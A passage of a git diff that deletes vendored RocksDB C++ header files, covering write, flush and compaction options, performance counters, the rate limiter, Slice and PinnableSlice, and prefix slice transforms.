-// Options that control write operations
-struct WriteOptions {
-  // If true, the write will be flushed from the operating system
-  // buffer cache (by calling WritableFile::Sync()) before the write
-  // is considered complete.  If this flag is true, writes will be
-  // slower.
-  //
-  // If this flag is false, and the machine crashes, some recent
-  // writes may be lost.  Note that if it is just the process that
-  // crashes (i.e., the machine does not reboot), no writes will be
-  // lost even if sync==false.
-  //
-  // In other words, a DB write with sync==false has similar
-  // crash semantics as the "write()" system call.  A DB write
-  // with sync==true has similar crash semantics to a "write()"
-  // system call followed by "fdatasync()".
-  //
-  // Default: false
-  bool sync;
-
-  // If true, writes will not first go to the write ahead log,
-  // and the write may got lost after a crash.
-  bool disableWAL;
-
-  // If true and if user is trying to write to column families that don't exist
-  // (they were dropped),  ignore the write (don't return an error). If there
-  // are multiple writes in a WriteBatch, other writes will succeed.
-  // Default: false
-  bool ignore_missing_column_families;
-
-  // If true and we need to wait or sleep for the write request, fails
-  // immediately with Status::Incomplete().
-  bool no_slowdown;
-
-  // If true, this write request is of lower priority if compaction is
-  // behind. In this case, no_slowdown = true, the request will be cancelled
-  // immediately with Status::Incomplete() returned. Otherwise, it will be
-  // slowed down. The slowdown value is determined by RocksDB to guarantee
-  // it introduces minimum impacts to high priority writes.
-  //
-  // Default: false
-  bool low_pri;
-
-  WriteOptions()
-      : sync(false),
-        disableWAL(false),
-        ignore_missing_column_families(false),
-        no_slowdown(false),
-        low_pri(false) {}
-};
-
-// Options that control flush operations
-struct FlushOptions {
-  // If true, the flush will wait until the flush is done.
-  // Default: true
-  bool wait;
-
-  FlushOptions() : wait(true) {}
-};
-
-// Create a Logger from provided DBOptions
-extern Status CreateLoggerFromOptions(const std::string& dbname,
-                                      const DBOptions& options,
-                                      std::shared_ptr<Logger>* logger);
-
-// CompactionOptions are used in CompactFiles() call.
-struct CompactionOptions {
-  // Compaction output compression type
-  // Default: snappy
-  CompressionType compression;
-  // Compaction will create files of size `output_file_size_limit`.
-  // Default: MAX, which means that compaction will create a single file
-  uint64_t output_file_size_limit;
-
-  CompactionOptions()
-      : compression(kSnappyCompression),
-        output_file_size_limit(std::numeric_limits<uint64_t>::max()) {}
-};
-
-// For level based compaction, we can configure if we want to skip/force
-// bottommost level compaction.
-enum class BottommostLevelCompaction {
-  // Skip bottommost level compaction
-  kSkip,
-  // Only compact bottommost level if there is a compaction filter
-  // This is the default option
-  kIfHaveCompactionFilter,
-  // Always compact bottommost level
-  kForce,
-};
-
-// CompactRangeOptions is used by CompactRange() call.
-struct CompactRangeOptions {
-  // If true, no other compaction will run at the same time as this
-  // manual compaction
-  bool exclusive_manual_compaction = true;
-  // If true, compacted files will be moved to the minimum level capable
-  // of holding the data or given level (specified non-negative target_level).
-  bool change_level = false;
-  // If change_level is true and target_level have non-negative value, compacted
-  // files will be moved to target_level.
-  int target_level = -1;
-  // Compaction outputs will be placed in options.db_paths[target_path_id].
-  // Behavior is undefined if target_path_id is out of range.
-  uint32_t target_path_id = 0;
-  // By default level based compaction will only compact the bottommost level
-  // if there is a compaction filter
-  BottommostLevelCompaction bottommost_level_compaction =
-      BottommostLevelCompaction::kIfHaveCompactionFilter;
-};
-
-// IngestExternalFileOptions is used by IngestExternalFile()
-struct IngestExternalFileOptions {
-  // Can be set to true to move the files instead of copying them.
-  bool move_files = false;
-  // If set to false, an ingested file keys could appear in existing snapshots
-  // that where created before the file was ingested.
-  bool snapshot_consistency = true;
-  // If set to false, IngestExternalFile() will fail if the file key range
-  // overlaps with existing keys or tombstones in the DB.
-  bool allow_global_seqno = true;
-  // If set to false and the file key range overlaps with the memtable key range
-  // (memtable flush required), IngestExternalFile will fail.
-  bool allow_blocking_flush = true;
-  // Set to true if you would like duplicate keys in the file being ingested
-  // to be skipped rather than overwriting existing data under that key.
-  // Usecase: back-fill of some historical data in the database without
-  // over-writing existing newer version of data.
-  // This option could only be used if the DB has been running
-  // with allow_ingest_behind=true since the dawn of time.
-  // All files will be ingested at the bottommost level with seqno=0.
-  bool ingest_behind = false;
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_OPTIONS_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/perf_context.h b/thirdparty/rocksdb/include/rocksdb/perf_context.h
deleted file mode 100644
index 1095d06..0000000
--- a/thirdparty/rocksdb/include/rocksdb/perf_context.h
+++ /dev/null
@@ -1,164 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_PERF_CONTEXT_H
-#define STORAGE_ROCKSDB_INCLUDE_PERF_CONTEXT_H
-
-#include <stdint.h>
-#include <string>
-
-#include "rocksdb/perf_level.h"
-
-namespace rocksdb {
-
-// A thread local context for gathering performance counter efficiently
-// and transparently.
-// Use SetPerfLevel(PerfLevel::kEnableTime) to enable time stats.
-
-struct PerfContext {
-
-  void Reset(); // reset all performance counters to zero
-
-  std::string ToString(bool exclude_zero_counters = false) const;
-
-  uint64_t user_key_comparison_count; // total number of user key comparisons
-  uint64_t block_cache_hit_count;     // total number of block cache hits
-  uint64_t block_read_count;          // total number of block reads (with IO)
-  uint64_t block_read_byte;           // total number of bytes from block reads
-  uint64_t block_read_time;           // total nanos spent on block reads
-  uint64_t block_checksum_time;       // total nanos spent on block checksum
-  uint64_t block_decompress_time;  // total nanos spent on block decompression
-
-  uint64_t get_read_bytes;       // bytes for vals returned by Get
-  uint64_t multiget_read_bytes;  // bytes for vals returned by MultiGet
-  uint64_t iter_read_bytes;      // bytes for keys/vals decoded by iterator
-
-  // total number of internal keys skipped over during iteration.
-  // There are several reasons for it:
-  // 1. when calling Next(), the iterator is in the position of the previous
-  //    key, so that we'll need to skip it. It means this counter will always
-  //    be incremented in Next().
-  // 2. when calling Next(), we need to skip internal entries for the previous
-  //    keys that are overwritten.
-  // 3. when calling Next(), Seek() or SeekToFirst(), after previous key
-  //    before calling Next(), the seek key in Seek() or the beginning for
-  //    SeekToFirst(), there may be one or more deleted keys before the next
-  //    valid key that the operation should place the iterator to. We need
-  //    to skip both of the tombstone and updates hidden by the tombstones. The
-  //    tombstones are not included in this counter, while previous updates
-  //    hidden by the tombstones will be included here.
-  // 4. symmetric cases for Prev() and SeekToLast()
-  // internal_recent_skipped_count is not included in this counter.
-  //
-  uint64_t internal_key_skipped_count;
-  // Total number of deletes and single deletes skipped over during iteration
-  // When calling Next(), Seek() or SeekToFirst(), after previous position
-  // before calling Next(), the seek key in Seek() or the beginning for
-  // SeekToFirst(), there may be one or more deleted keys before the next valid
-  // key. Every deleted key is counted once. We don't recount here if there are
-  // still older updates invalidated by the tombstones.
-  //
-  uint64_t internal_delete_skipped_count;
-  // How many times iterators skipped over internal keys that are more recent
-  // than the snapshot that iterator is using.
-  //
-  uint64_t internal_recent_skipped_count;
-  // How many values were fed into merge operator by iterators.
-  //
-  uint64_t internal_merge_count;
-
-  uint64_t get_snapshot_time;       // total nanos spent on getting snapshot
-  uint64_t get_from_memtable_time;  // total nanos spent on querying memtables
-  uint64_t get_from_memtable_count;    // number of mem tables queried
-  // total nanos spent after Get() finds a key
-  uint64_t get_post_process_time;
-  uint64_t get_from_output_files_time;  // total nanos reading from output files
-  // total nanos spent on seeking memtable
-  uint64_t seek_on_memtable_time;
-  // number of seeks issued on memtable
-  // (including SeekForPrev but not SeekToFirst and SeekToLast)
-  uint64_t seek_on_memtable_count;
-  // number of Next()s issued on memtable
-  uint64_t next_on_memtable_count;
-  // number of Prev()s issued on memtable
-  uint64_t prev_on_memtable_count;
-  // total nanos spent on seeking child iters
-  uint64_t seek_child_seek_time;
-  // number of seek issued in child iterators
-  uint64_t seek_child_seek_count;
-  uint64_t seek_min_heap_time;  // total nanos spent on the merge min heap
-  uint64_t seek_max_heap_time;  // total nanos spent on the merge max heap
-  // total nanos spent on seeking the internal entries
-  uint64_t seek_internal_seek_time;
-  // total nanos spent on iterating internal entries to find the next user entry
-  uint64_t find_next_user_entry_time;
-
-  // total nanos spent on writing to WAL
-  uint64_t write_wal_time;
-  // total nanos spent on writing to mem tables
-  uint64_t write_memtable_time;
-  // total nanos spent on delaying write
-  uint64_t write_delay_time;
-  // total nanos spent on writing a record, excluding the above three times
-  uint64_t write_pre_and_post_process_time;
-
-  uint64_t db_mutex_lock_nanos;      // time spent on acquiring DB mutex.
-  // Time spent on waiting with a condition variable created with DB mutex.
-  uint64_t db_condition_wait_nanos;
-  // Time spent on merge operator.
-  uint64_t merge_operator_time_nanos;
-
-  // Time spent on reading index block from block cache or SST file
-  uint64_t read_index_block_nanos;
-  // Time spent on reading filter block from block cache or SST file
-  uint64_t read_filter_block_nanos;
-  // Time spent on creating data block iterator
-  uint64_t new_table_block_iter_nanos;
-  // Time spent on creating a iterator of an SST file.
-  uint64_t new_table_iterator_nanos;
-  // Time spent on seeking a key in data/index blocks
-  uint64_t block_seek_nanos;
-  // Time spent on finding or creating a table reader
-  uint64_t find_table_nanos;
-  // total number of mem table bloom hits
-  uint64_t bloom_memtable_hit_count;
-  // total number of mem table bloom misses
-  uint64_t bloom_memtable_miss_count;
-  // total number of SST table bloom hits
-  uint64_t bloom_sst_hit_count;
-  // total number of SST table bloom misses
-  uint64_t bloom_sst_miss_count;
-
-  // Total time spent in Env filesystem operations. These are only populated
-  // when TimedEnv is used.
-  uint64_t env_new_sequential_file_nanos;
-  uint64_t env_new_random_access_file_nanos;
-  uint64_t env_new_writable_file_nanos;
-  uint64_t env_reuse_writable_file_nanos;
-  uint64_t env_new_random_rw_file_nanos;
-  uint64_t env_new_directory_nanos;
-  uint64_t env_file_exists_nanos;
-  uint64_t env_get_children_nanos;
-  uint64_t env_get_children_file_attributes_nanos;
-  uint64_t env_delete_file_nanos;
-  uint64_t env_create_dir_nanos;
-  uint64_t env_create_dir_if_missing_nanos;
-  uint64_t env_delete_dir_nanos;
-  uint64_t env_get_file_size_nanos;
-  uint64_t env_get_file_modification_time_nanos;
-  uint64_t env_rename_file_nanos;
-  uint64_t env_link_file_nanos;
-  uint64_t env_lock_file_nanos;
-  uint64_t env_unlock_file_nanos;
-  uint64_t env_new_logger_nanos;
-};
-
-// Get Thread-local PerfContext object pointer
-// if defined(NPERF_CONTEXT), then the pointer is not thread-local
-PerfContext* get_perf_context();
-
-}
-
-#endif
diff --git a/thirdparty/rocksdb/include/rocksdb/perf_level.h b/thirdparty/rocksdb/include/rocksdb/perf_level.h
deleted file mode 100644
index 84a331c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/perf_level.h
+++ /dev/null
@@ -1,33 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef INCLUDE_ROCKSDB_PERF_LEVEL_H_
-#define INCLUDE_ROCKSDB_PERF_LEVEL_H_
-
-#include <stdint.h>
-#include <string>
-
-namespace rocksdb {
-
-// How much perf stats to collect. Affects perf_context and iostats_context.
-enum PerfLevel : unsigned char {
-  kUninitialized = 0,             // unknown setting
-  kDisable = 1,                   // disable perf stats
-  kEnableCount = 2,               // enable only count stats
-  kEnableTimeExceptForMutex = 3,  // Other than count stats, also enable time
-                                  // stats except for mutexes
-  kEnableTime = 4,                // enable count and time stats
-  kOutOfBounds = 5                // N.B. Must always be the last value!
-};
-
-// set the perf stats level for current thread
-void SetPerfLevel(PerfLevel level);
-
-// get current perf stats level for current thread
-PerfLevel GetPerfLevel();
-
-}  // namespace rocksdb
-
-#endif  // INCLUDE_ROCKSDB_PERF_LEVEL_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/persistent_cache.h b/thirdparty/rocksdb/include/rocksdb/persistent_cache.h
deleted file mode 100644
index 05c3685..0000000
--- a/thirdparty/rocksdb/include/rocksdb/persistent_cache.h
+++ /dev/null
@@ -1,67 +0,0 @@
-// Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <stdint.h>
-#include <memory>
-#include <string>
-
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// PersistentCache
-//
-// Persistent cache interface for caching IO pages on a persistent medium. The
-// cache interface is specifically designed for persistent read cache.
-class PersistentCache {
- public:
-  typedef std::vector<std::map<std::string, double>> StatsType;
-
-  virtual ~PersistentCache() {}
-
-  // Insert to page cache
-  //
-  // page_key   Identifier to identify a page uniquely across restarts
-  // data       Page data
-  // size       Size of the page
-  virtual Status Insert(const Slice& key, const char* data,
-                        const size_t size) = 0;
-
-  // Lookup page cache by page identifier
-  //
-  // page_key   Page identifier
-  // buf        Buffer where the data should be copied
-  // size       Size of the page
-  virtual Status Lookup(const Slice& key, std::unique_ptr<char[]>* data,
-                        size_t* size) = 0;
-
-  // Is cache storing uncompressed data ?
-  //
-  // True if the cache is configured to store uncompressed data else false
-  virtual bool IsCompressed() = 0;
-
-  // Return stats as map of {string, double} per-tier
-  //
-  // Persistent cache can be initialized as a tier of caches. The stats are per
-  // tire top-down
-  virtual StatsType Stats() = 0;
-
-  virtual std::string GetPrintableOptions() const = 0;
-};
-
-// Factor method to create a new persistent cache
-Status NewPersistentCache(Env* const env, const std::string& path,
-                          const uint64_t size,
-                          const std::shared_ptr<Logger>& log,
-                          const bool optimized_for_nvm,
-                          std::shared_ptr<PersistentCache>* cache);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/rate_limiter.h b/thirdparty/rocksdb/include/rocksdb/rate_limiter.h
deleted file mode 100644
index 838c98a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/rate_limiter.h
+++ /dev/null
@@ -1,135 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include "rocksdb/env.h"
-#include "rocksdb/statistics.h"
-
-namespace rocksdb {
-
-class RateLimiter {
- public:
-  enum class OpType {
-    // Limitation: we currently only invoke Request() with OpType::kRead for
-    // compactions when DBOptions::new_table_reader_for_compaction_inputs is set
-    kRead,
-    kWrite,
-  };
-  enum class Mode {
-    kReadsOnly,
-    kWritesOnly,
-    kAllIo,
-  };
-
-  // For API compatibility, default to rate-limiting writes only.
-  explicit RateLimiter(Mode mode = Mode::kWritesOnly) : mode_(mode) {}
-
-  virtual ~RateLimiter() {}
-
-  // This API allows user to dynamically change rate limiter's bytes per second.
-  // REQUIRED: bytes_per_second > 0
-  virtual void SetBytesPerSecond(int64_t bytes_per_second) = 0;
-
-  // Deprecated. New RateLimiter derived classes should override
-  // Request(const int64_t, const Env::IOPriority, Statistics*) or
-  // Request(const int64_t, const Env::IOPriority, Statistics*, OpType)
-  // instead.
-  //
-  // Request for token for bytes. If this request can not be satisfied, the call
-  // is blocked. Caller is responsible to make sure
-  // bytes <= GetSingleBurstBytes()
-  virtual void Request(const int64_t bytes, const Env::IOPriority pri) {
-    assert(false);
-  }
-
-  // Request for token for bytes and potentially update statistics. If this
-  // request can not be satisfied, the call is blocked. Caller is responsible to
-  // make sure bytes <= GetSingleBurstBytes().
-  virtual void Request(const int64_t bytes, const Env::IOPriority pri,
-                       Statistics* /* stats */) {
-    // For API compatibility, default implementation calls the older API in
-    // which statistics are unsupported.
-    Request(bytes, pri);
-  }
-
-  // Requests token to read or write bytes and potentially updates statistics.
-  //
-  // If this request can not be satisfied, the call is blocked. Caller is
-  // responsible to make sure bytes <= GetSingleBurstBytes().
-  virtual void Request(const int64_t bytes, const Env::IOPriority pri,
-                       Statistics* stats, OpType op_type) {
-    if (IsRateLimited(op_type)) {
-      Request(bytes, pri, stats);
-    }
-  }
-
-  // Requests token to read or write bytes and potentially updates statistics.
-  // Takes into account GetSingleBurstBytes() and alignment (e.g., in case of
-  // direct I/O) to allocate an appropriate number of bytes, which may be less
-  // than the number of bytes requested.
-  virtual size_t RequestToken(size_t bytes, size_t alignment,
-                              Env::IOPriority io_priority, Statistics* stats,
-                              RateLimiter::OpType op_type);
-
-  // Max bytes can be granted in a single burst
-  virtual int64_t GetSingleBurstBytes() const = 0;
-
-  // Total bytes that go though rate limiter
-  virtual int64_t GetTotalBytesThrough(
-      const Env::IOPriority pri = Env::IO_TOTAL) const = 0;
-
-  // Total # of requests that go though rate limiter
-  virtual int64_t GetTotalRequests(
-      const Env::IOPriority pri = Env::IO_TOTAL) const = 0;
-
-  virtual int64_t GetBytesPerSecond() const = 0;
-
-  virtual bool IsRateLimited(OpType op_type) {
-    if ((mode_ == RateLimiter::Mode::kWritesOnly &&
-         op_type == RateLimiter::OpType::kRead) ||
-        (mode_ == RateLimiter::Mode::kReadsOnly &&
-         op_type == RateLimiter::OpType::kWrite)) {
-      return false;
-    }
-    return true;
-  }
-
- protected:
-  Mode GetMode() { return mode_; }
-
- private:
-  const Mode mode_;
-};
-
-// Create a RateLimiter object, which can be shared among RocksDB instances to
-// control write rate of flush and compaction.
-// @rate_bytes_per_sec: this is the only parameter you want to set most of the
-// time. It controls the total write rate of compaction and flush in bytes per
-// second. Currently, RocksDB does not enforce rate limit for anything other
-// than flush and compaction, e.g. write to WAL.
-// @refill_period_us: this controls how often tokens are refilled. For example,
-// when rate_bytes_per_sec is set to 10MB/s and refill_period_us is set to
-// 100ms, then 1MB is refilled every 100ms internally. Larger value can lead to
-// burstier writes while smaller value introduces more CPU overhead.
-// The default should work for most cases.
-// @fairness: RateLimiter accepts high-pri requests and low-pri requests.
-// A low-pri request is usually blocked in favor of hi-pri request. Currently,
-// RocksDB assigns low-pri to request from compaction and high-pri to request
-// from flush. Low-pri requests can get blocked if flush requests come in
-// continuously. This fairness parameter grants low-pri requests permission by
-// 1/fairness chance even though high-pri requests exist to avoid starvation.
-// You should be good by leaving it at default 10.
-// @mode: Mode indicates which types of operations count against the limit.
-extern RateLimiter* NewGenericRateLimiter(
-    int64_t rate_bytes_per_sec, int64_t refill_period_us = 100 * 1000,
-    int32_t fairness = 10,
-    RateLimiter::Mode mode = RateLimiter::Mode::kWritesOnly);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/slice.h b/thirdparty/rocksdb/include/rocksdb/slice.h
deleted file mode 100644
index 4f24c8a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/slice.h
+++ /dev/null
@@ -1,242 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Slice is a simple structure containing a pointer into some external
-// storage and a size.  The user of a Slice must ensure that the slice
-// is not used after the corresponding external storage has been
-// deallocated.
-//
-// Multiple threads can invoke const methods on a Slice without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same Slice must use
-// external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_SLICE_H_
-#define STORAGE_ROCKSDB_INCLUDE_SLICE_H_
-
-#include <assert.h>
-#include <cstdio>
-#include <stddef.h>
-#include <string.h>
-#include <string>
-
-#include "rocksdb/cleanable.h"
-
-namespace rocksdb {
-
-class Slice {
- public:
-  // Create an empty slice.
-  Slice() : data_(""), size_(0) { }
-
-  // Create a slice that refers to d[0,n-1].
-  Slice(const char* d, size_t n) : data_(d), size_(n) { }
-
-  // Create a slice that refers to the contents of "s"
-  /* implicit */
-  Slice(const std::string& s) : data_(s.data()), size_(s.size()) { }
-
-  // Create a slice that refers to s[0,strlen(s)-1]
-  /* implicit */
-  Slice(const char* s) : data_(s), size_(strlen(s)) { }
-
-  // Create a single slice from SliceParts using buf as storage.
-  // buf must exist as long as the returned Slice exists.
-  Slice(const struct SliceParts& parts, std::string* buf);
-
-  // Return a pointer to the beginning of the referenced data
-  const char* data() const { return data_; }
-
-  // Return the length (in bytes) of the referenced data
-  size_t size() const { return size_; }
-
-  // Return true iff the length of the referenced data is zero
-  bool empty() const { return size_ == 0; }
-
-  // Return the ith byte in the referenced data.
-  // REQUIRES: n < size()
-  char operator[](size_t n) const {
-    assert(n < size());
-    return data_[n];
-  }
-
-  // Change this slice to refer to an empty array
-  void clear() { data_ = ""; size_ = 0; }
-
-  // Drop the first "n" bytes from this slice.
-  void remove_prefix(size_t n) {
-    assert(n <= size());
-    data_ += n;
-    size_ -= n;
-  }
-
-  void remove_suffix(size_t n) {
-    assert(n <= size());
-    size_ -= n;
-  }
-
-  // Return a string that contains the copy of the referenced data.
-  // when hex is true, returns a string of twice the length hex encoded (0-9A-F)
-  std::string ToString(bool hex = false) const;
-
-  // Decodes the current slice interpreted as an hexadecimal string into result,
-  // if successful returns true, if this isn't a valid hex string
-  // (e.g not coming from Slice::ToString(true)) DecodeHex returns false.
-  // This slice is expected to have an even number of 0-9A-F characters
-  // also accepts lowercase (a-f)
-  bool DecodeHex(std::string* result) const;
-
-  // Three-way comparison.  Returns value:
-  //   <  0 iff "*this" <  "b",
-  //   == 0 iff "*this" == "b",
-  //   >  0 iff "*this" >  "b"
-  int compare(const Slice& b) const;
-
-  // Return true iff "x" is a prefix of "*this"
-  bool starts_with(const Slice& x) const {
-    return ((size_ >= x.size_) &&
-            (memcmp(data_, x.data_, x.size_) == 0));
-  }
-
-  bool ends_with(const Slice& x) const {
-    return ((size_ >= x.size_) &&
-            (memcmp(data_ + size_ - x.size_, x.data_, x.size_) == 0));
-  }
-
-  // Compare two slices and returns the first byte where they differ
-  size_t difference_offset(const Slice& b) const;
-
- // private: make these public for rocksdbjni access
-  const char* data_;
-  size_t size_;
-
-  // Intentionally copyable
-};
-
-/**
- * A Slice that can be pinned with some cleanup tasks, which will be run upon
- * ::Reset() or object destruction, whichever is invoked first. This can be used
- * to avoid memcpy by having the PinnsableSlice object referring to the data
- * that is locked in the memory and release them after the data is consumed.
- */
-class PinnableSlice : public Slice, public Cleanable {
- public:
-  PinnableSlice() { buf_ = &self_space_; }
-  explicit PinnableSlice(std::string* buf) { buf_ = buf; }
-
-  // No copy constructor and copy assignment allowed.
-  PinnableSlice(PinnableSlice&) = delete;
-  PinnableSlice& operator=(PinnableSlice&) = delete;
-
-  inline void PinSlice(const Slice& s, CleanupFunction f, void* arg1,
-                       void* arg2) {
-    assert(!pinned_);
-    pinned_ = true;
-    data_ = s.data();
-    size_ = s.size();
-    RegisterCleanup(f, arg1, arg2);
-    assert(pinned_);
-  }
-
-  inline void PinSlice(const Slice& s, Cleanable* cleanable) {
-    assert(!pinned_);
-    pinned_ = true;
-    data_ = s.data();
-    size_ = s.size();
-    cleanable->DelegateCleanupsTo(this);
-    assert(pinned_);
-  }
-
-  inline void PinSelf(const Slice& slice) {
-    assert(!pinned_);
-    buf_->assign(slice.data(), slice.size());
-    data_ = buf_->data();
-    size_ = buf_->size();
-    assert(!pinned_);
-  }
-
-  inline void PinSelf() {
-    assert(!pinned_);
-    data_ = buf_->data();
-    size_ = buf_->size();
-    assert(!pinned_);
-  }
-
-  void remove_suffix(size_t n) {
-    assert(n <= size());
-    if (pinned_) {
-      size_ -= n;
-    } else {
-      buf_->erase(size() - n, n);
-      PinSelf();
-    }
-  }
-
-  void remove_prefix(size_t n) {
-    assert(0);  // Not implemented
-  }
-
-  void Reset() {
-    Cleanable::Reset();
-    pinned_ = false;
-  }
-
-  inline std::string* GetSelf() { return buf_; }
-
-  inline bool IsPinned() { return pinned_; }
-
- private:
-  friend class PinnableSlice4Test;
-  std::string self_space_;
-  std::string* buf_;
-  bool pinned_ = false;
-};
-
-// A set of Slices that are virtually concatenated together.  'parts' points
-// to an array of Slices.  The number of elements in the array is 'num_parts'.
-struct SliceParts {
-  SliceParts(const Slice* _parts, int _num_parts) :
-      parts(_parts), num_parts(_num_parts) { }
-  SliceParts() : parts(nullptr), num_parts(0) {}
-
-  const Slice* parts;
-  int num_parts;
-};
-
-inline bool operator==(const Slice& x, const Slice& y) {
-  return ((x.size() == y.size()) &&
-          (memcmp(x.data(), y.data(), x.size()) == 0));
-}
-
-inline bool operator!=(const Slice& x, const Slice& y) {
-  return !(x == y);
-}
-
-inline int Slice::compare(const Slice& b) const {
-  assert(data_ != nullptr && b.data_ != nullptr);
-  const size_t min_len = (size_ < b.size_) ? size_ : b.size_;
-  int r = memcmp(data_, b.data_, min_len);
-  if (r == 0) {
-    if (size_ < b.size_) r = -1;
-    else if (size_ > b.size_) r = +1;
-  }
-  return r;
-}
-
-inline size_t Slice::difference_offset(const Slice& b) const {
-  size_t off = 0;
-  const size_t len = (size_ < b.size_) ? size_ : b.size_;
-  for (; off < len; off++) {
-    if (data_[off] != b.data_[off]) break;
-  }
-  return off;
-}
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_SLICE_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/slice_transform.h b/thirdparty/rocksdb/include/rocksdb/slice_transform.h
deleted file mode 100644
index fc82bf5..0000000
--- a/thirdparty/rocksdb/include/rocksdb/slice_transform.h
+++ /dev/null
@@ -1,99 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Class for specifying user-defined functions which perform a
-// transformation on a slice.  It is not required that every slice
-// belong to the domain and/or range of a function.  Subclasses should
-// define InDomain and InRange to determine which slices are in either
-// of these sets respectively.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_SLICE_TRANSFORM_H_
-#define STORAGE_ROCKSDB_INCLUDE_SLICE_TRANSFORM_H_
-
-#include <string>
-
-namespace rocksdb {
-
-class Slice;
-
-/*
- * A SliceTranform is a generic pluggable way of transforming one string
- * to another. Its primary use-case is in configuring rocksdb
- * to store prefix blooms by setting prefix_extractor in
- * ColumnFamilyOptions.
- */
-class SliceTransform {
- public:
-  virtual ~SliceTransform() {};
-
-  // Return the name of this transformation.
-  virtual const char* Name() const = 0;
-
-  // Extract a prefix from a specified key. This method is called when
-  // a key is inserted into the db, and the returned slice is used to
-  // create a bloom filter.
-  virtual Slice Transform(const Slice& key) const = 0;
-
-  // Determine whether the specified key is compatible with the logic
-  // specified in the Transform method. This method is invoked for every
-  // key that is inserted into the db. If this method returns true,
-  // then Transform is called to translate the key to its prefix and
-  // that returned prefix is inserted into the bloom filter. If this
-  // method returns false, then the call to Transform is skipped and
-  // no prefix is inserted into the bloom filters.
-  //
-  // For example, if the Transform method operates on a fixed length
-  // prefix of size 4, then an invocation to InDomain("abc") returns
-  // false because the specified key length(3) is shorter than the
-  // prefix size of 4.
-  //
-  // Wiki documentation here:
-  // https://github.com/facebook/rocksdb/wiki/Prefix-Seek-API-Changes
-  //
-  virtual bool InDomain(const Slice& key) const = 0;
-
-  // This is currently not used and remains here for backward compatibility.
-  virtual bool InRange(const Slice& dst) const { return false; }
-
-  // Transform(s)=Transform(`prefix`) for any s with `prefix` as a prefix.
-  //
-  // This function is not used by RocksDB, but for users. If users pass
-  // Options by string to RocksDB, they might not know what prefix extractor
-  // they are using. This function is to help users can determine:
-  //   if they want to iterate all keys prefixing `prefix`, whether it is
-  //   safe to use prefix bloom filter and seek to key `prefix`.
-  // If this function returns true, this means a user can Seek() to a prefix
-  // using the bloom filter. Otherwise, user needs to skip the bloom filter
-  // by setting ReadOptions.total_order_seek = true.
-  //
-  // Here is an example: Suppose we implement a slice transform that returns
-  // the first part of the string after spliting it using delimiter ",":
-  // 1. SameResultWhenAppended("abc,") should return true. If applying prefix
-  //    bloom filter using it, all slices matching "abc:.*" will be extracted
-  //    to "abc,", so any SST file or memtable containing any of those key
-  //    will not be filtered out.
-  // 2. SameResultWhenAppended("abc") should return false. A user will not
-  //    guaranteed to see all the keys matching "abc.*" if a user seek to "abc"
-  //    against a DB with the same setting. If one SST file only contains
-  //    "abcd,e", the file can be filtered out and the key will be invisible.
-  //
-  // i.e., an implementation always returning false is safe.
-  virtual bool SameResultWhenAppended(const Slice& prefix) const {
-    return false;
-  }
-};
-
-extern const SliceTransform* NewFixedPrefixTransform(size_t prefix_len);
-
-extern const SliceTransform* NewCappedPrefixTransform(size_t cap_len);
-
-extern const SliceTransform* NewNoopTransform();
-
-}
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_SLICE_TRANSFORM_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/snapshot.h b/thirdparty/rocksdb/include/rocksdb/snapshot.h
deleted file mode 100644
index a96eb76..0000000
--- a/thirdparty/rocksdb/include/rocksdb/snapshot.h
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
